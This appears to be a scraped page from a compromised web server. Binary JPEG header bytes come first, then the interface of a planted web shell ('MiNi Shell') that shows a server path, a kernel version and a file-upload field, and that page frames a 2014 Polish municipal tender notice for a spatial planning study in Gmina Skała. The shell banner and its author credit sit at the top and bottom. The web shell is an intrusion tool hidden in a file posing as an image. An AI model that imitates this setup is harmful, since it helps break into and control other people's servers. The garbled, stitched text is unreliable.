JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140722/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140722/244396-N-2014.html

<p class="kh_header"><b>Skała: OPRACOWANIE  STUDIUM  UWARUNKOWAŃ I KIERUNKÓW ZAGOSPODAROWANIA PRZESTRZENNEGO  GMINY SKAŁA</b><br>
<b>Numer ogłoszenia: 244396 - 2014; data zamieszczenia: 22.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Skała , ul. Rynek 29, 32-043 Skała, woj. małopolskie, tel. 012 3891098, faks 012 3891098 w. 104.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.skala.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE  STUDIUM  UWARUNKOWAŃ I KIERUNKÓW ZAGOSPODAROWANIA PRZESTRZENNEGO  GMINY SKAŁA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie  zadania inwestycyjnego  pn.: Opracowanie Studium uwarunkowań i kierunków zagospodarowania przestrzennego  Gminy Skała
2.Przedmiotem zamówienia  jest:
Opracowanie Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Skała zgodnie  z Uchwałą nr  XLVI/340/14 Rady Miejskiej w Skale z dnia 25 marca 2014 roku oraz uchwałą zmieniającą nr XLVIII/353/14 Rady Miejskiej w Skale z dnia 27 maja 2014r.
w sprawie przystąpienia do procedury sporządzenia Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Skała załącznik nr 8 do SIWZ 
3.Obszar i granice opracowania :
w granicach administracyjnych gminy Skała, powierzchnia opracowania ok. 7 430 ha
4. Studium musi być opracowane na podstawie następujących aktów prawnych:
- ustawa z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80 poz. 717 z późn. zm., tekst jednolity Dz.U. 2012 Nr 0 poz. 647z późn. zm),
-Rozporządzenie Ministra Infrastruktury z dnia 28 kwietnia 2004 r. w sprawie zakresu projektu Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz. U. Nr 118, poz. 1233),
-przepisy szczególne dotyczące ochrony środowiska, przyrody, zabytków, prawo wodne, ochrony gruntów rolnych i leśnych itd.,
-ustawa z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2008 r., Nr 199, poz.1227 z późn. zm.tekst jednolity Dz. U. 2013 Nr 0 poz. 1235z późn. zm).
5. Opracowanie projektu Studium winno być poprzedzone wariantowymi koncepcjami terenu objętego opracowaniem, które podlegać będzie akceptacji Zamawiającego. 
6. W ramach przedmiotu zamówienia Wykonawca wykona:
- dokumentację formalno - prawną prac nad Studium,
- opracowania graficzne informacji planistycznych stanowiących zasób materiałów wyjściowych  i analiz,
- propozycje  Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy,
- analizę uwag dotyczących projektu Studium oraz przygotowanie stanowiska Burmistrza Miasta i  Gminy dotyczącego ich uwzględnienia lub nieuwzględnienia,
- analiza złożonych uwag i wniosków do zmiany studium i kierunków zagospodarowania przestrzennego z przygotowaniem projektu rozstrzygnięcia Burmistrza o sposobie ich uwzględnienia
- inwentaryzację urbanistyczną - prace terenowe, wizja terenowa zainwestowania    i uzbrojenia terenu oraz elementów przyrodniczych,
- przygotowanie merytoryczne dokumentów formalno-prawnych, projekty pism zgodnie      z art. 11 ustawy o planowaniu i zagospodarowaniu przestrzennym,                                                                                        - ogłoszenia, obwieszczenia, wykazy, zestawienia, wystąpienia, uchwały i współpracę przy prowadzeniu procedury oraz dokumentacji prac planistycznych, 
- prezentację projektu Studium i uczestnictwo w publicznej dyskusji na temat przyjętych                                                         w projekcie rozwiązań; prezentację projektu Studium podczas posiedzeń komisji Rady Miejskiej i Gminnej Komisji Urbanistycznej, prezentacji projektu Studium podczas sesji Rady Miejskiej,
- uzyskanie akceptacji Zamawiającego dla przyjętych rozwiązań po zakończeniu każdego z etapów prac planistycznych,
- uzyskanie wymaganych przepisami prawa uzgodnień i opinii wraz z przygotowaniem projektów pism do instytucji i organów opiniujących i uzgadniających Studium wraz z prognozą oddziaływania na środowisko,
- analizę otrzymanych opinii i uzgodnień wraz z przygotowaniem wykazu opinii oraz wprowadzeniem zmian wynikłych z uzyskanych opinii i uzgodnień, ewentualne wdrożenie ponownej procedury opiniowania i uzgadniania,
- przygotowanie projektów pism związanych z wyłożeniem Studium do publicznego wglądu,
- uczestniczenie i udzielanie niezbędnych wyjaśnień w dyskusji publicznej nad przyjętymi w projekcie Studium rozwiązaniami oraz sporządzenie protokołu z tej dyskusji,
- analizę złożonych uwag do wyłożonego projektu Studium, sporządzenie wykazu 
wraz z pisemnym stanowiskiem dotyczącym ich uwzględnienia lub nieuwzględnienia,
- wprowadzenie zmian do projektu Studium wynikających z uwzględnienia wniesionych uwag,               a następnie w niezbędnym zakresie ponowienie uzgodnień,
- przedłożenie Radzie Miejskiej w Skale projektu Studium po zmianach wynikających  z uwzględnionych uwag - projekt uchwały wraz z załącznikami,
- przygotowanie do przedstawienia Wojewodzie uchwały o uchwaleniu Studium wraz  z załącznikami oraz dokumentacją prac planistycznych,
- udział w czynnościach niezbędnych do ewentualnego doprowadzenia Studium do zgodności z przepisami prawa, w sytuacji stwierdzenia nieważności uchwały przez Wojewodę.
Wszelkie prace projektowe lub czynności nie opisane powyżej, a wynikające z procedur określonych w ustawie oraz przepisach szczególnych, niezbędne do właściwego i kompletnego opracowania zamówienia Wykonawca winien wykonać w ramach przedmiotu zamówienia  i uwzględnić w kosztach i terminach wykonania przedmiotu zamówienia.
7. Wykonawca zobowiązany będzie do wykonania wszelkich koniecznych opracowań uzupełniających w szczególności takich, jak: 
- prognoza oddziaływania na środowisko do  Studium uwarunkowań i kierunków zagospodarowania przestrzennego,
- wykonanie opracowania ekofizjograficznego zgodnie z Rozporządzeniem Ministra Środowiska      z dnia 9 września 2002 r. w sprawie opracowań ekofizjograficznych Dz. U. Nr 155, poz. 1298 na obszar objęty  Studium uwarunkowań i kierunków zagospodarowania przestrzennego,
- opracowanie projektów dokumentów, o których mowa w art. 11 ustawy o planowaniu i zagospodarowaniu przestrzennym oraz prowadzenie postępowania formalno-prawnego w imieniu Burmistrza Miasta i Gminy , zgodnie z wymogami ustawy jw.
8. W zakresie prowadzenia postępowania formalno-prawnego Wykonawca zobowiązany jest do:
- zapewnienia obsługi wyłożenia projektu Studium uwarunkowań do publicznego wglądu   w pełnym ich okresie wyłożenia,
- uczestniczenia w publicznych dyskusjach, o których mowa w art. 11 ustawy o planowaniu i zagospodarowaniu przestrzennym, cyklicznej prezentacji poszczególnych etapów, jak również uczestniczenia w innych spotkaniach organizowanych przez Zamawiającego związanych z przedmiotem zamówienia, w tym w posiedzeniach Komisji Rady Miejskiej i sesjach.
- Wszystkie czynności będące przedmiotem zamówienia Wykonawca zobowiązany będzie wykonać we własnym zakresie i na własny koszt, co uwzględni przy sporządzaniu oferty na zadanie jw. m. in.:
-opracowanie, redagowanie projektów pism zawiadamiających, uzgadniających, obwieszczających, opiniujących itp. 
-redagowanie projektów ogłoszeń, 
-przygotowanie projektów zawiadomień, obwieszczeń - również do prasy o wyłożeniu do publicznego wglądu itp. 
- Wykonawca zobowiązany jest również do uzyskania map do celów planistycznych na własny koszt,
9. Zamawiający przekaże Wykonawcy materiały znajdujące się w jego posiadaniu, a mogące służyć do opracowania przedmiotu zamówienia.
10. W ramach przedmiotu zamówienia Wykonawca sporządzi i przekaże Zamawiającemu:
- kompletny projekt uchwały w sprawie uchwalenia Studium zawierającego część tekstową i graficzną w formie papierowej - 5 egz. Wersję elektroniczną utworzoną w Edytorze Aktów Prawnych pliki w formacie *xlm - 1 egz. oraz w formacie doc lub docx.
- prognozę oddziaływania na środowisko- 5 egz. + 1 egz. w wersji elektronicznej CD/DVD;
- opracowanie ekofizjograficzne - 5 egz. + 1 egz. w wersji elektronicznej CD/DVD;
- rysunek kolorowy Studium w skali 1:10 000 - 5 egz. w tym: 1 egzemplarz, zafoliowany;
- tekst Studium w formie tradycyjnej - 5 egz.;
- Studium w wersji elektronicznej - 5 płyt CD/DVD nośnik elektroniczny do odczytu i wydruku, a dodatkowo zapis części graficznej - format plików:  JPG, DWG, PDF, DXF;
Dodatkowo załącznik graficzny w formie bazodanowej wszystkich wymienionych opracowań w plikach w formacie .shp (Shapefile), na nośnikach elektronicznych,  2 egzemplarze nośnika
- dokumentację formalno-prawną prac nad Studium w dwóch egzemplarzach (oryginał + kopia).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 2000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania tego warunku, Zamawiający wymaga wykazania przez Wykonawcę
następującego doświadczenia:
Wykonawca musi wykazać , że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał usługi obejmujące opracowanie  Studium uwarunkowań i kierunków zagospodarowania przestrzennego  w tym: 
a) znajdujące się na obszarze Parków Narodowych, 
b) obejmujące teren rezerwatu przyrody lub teren objęty obszarem Natura 2000 
c) obejmujące swoim zakresem powierzchnię co najmniej całego miasta i gminy o powierzchni nie mniejszej niż 5000 ha. 
Zamawiający uzna warunek za spełniony jeżeli powyżej wskazane Studia opracowane zostały  w jednym zamówieniu lub w oddzielnych zamówieniach.
Za opracowane Studium należy rozumieć Studium uchwalone i ogłoszone w Dzienniku Urzędowym Województwa i w stosunku do których nie zostały wydane rozstrzygnięcia nadzorcze.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania tego warunku, Zamawiający wymaga dysponowania:                     minimum 1 osobą posiadającą uprawnienia do wykonywania zawodu urbanisty, posiadającą aktualny wpis na listę członków właściwej Izby Urbanistów, o której mowa w art. 5 ust. 3 ustawy        z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5 poz. 42 ze zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonania zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia  zmian postanowień zawartej umowy w
stosunku do treści oferty na podstawie, której dokonano wyboru wykonawcy i określa
następujące warunki takich zmian :
a)Termin realizacji przedmiotu umowy w przypadku :
- wystąpienia opóźnień spowodowanych działaniem lub zaniechaniem organów oraz osób trzecich, których udział jest przewidziany w procedurze uzgadniania i opiniowania Studium uwarunkowań
-zawieszenia przez Zamawiającego wykonania prac,
-przestojów i opóźnień zawinionych przez Zamawiającego,
-działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne, zjawiska gospodarcze lub pogodowe) w pełni niezależnej od Stron umowy, mającej bezpośredni wpływ na termin wykonania prac,
-wystąpienia okoliczności, których Strony  umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
-przeszkód technicznych w pełni niezależnych od Stron umowy, mających bezpośredni wpływ na termin wykonania zamówienia.
b)Wysokość wynagrodzenia może nastąpić wyłącznie w przypadku urzędowej zmiany wysokości podatku od towarów  i usług:
-Zamawiający dokona zmiany wynagrodzenia wg zasady: netto bez zmian, podatek VAT zostanie podwyższony, bądź obniżony zgodnie z ustawową zmianą, cena brutto zostanie zwiększona lub zmniejszona co wynikać będzie bezpośrednio ze zmiany stawki VAT.
c) Inne zmiany spowodowane następującymi okolicznościami:
- zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy, na inne spełniające warunki określone w SIWZ. Zmiana ta nie wymaga aneksu do umowy, a dla skutecznej zmiany niezbędne jest uzyskanie zgody Zamawiającego na zaproponowaną osobę),
Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, jednocześnie nie stanowią one zobowiązania Zamawiającego na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.skala.pl/studium-2014<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> jw..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2014 godzina 10:00, miejsce: Urząd Miasta i Gminy Skała, Rynek 29; 32-043 Skała, Dziennik Podawczy pokój nr 0- parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com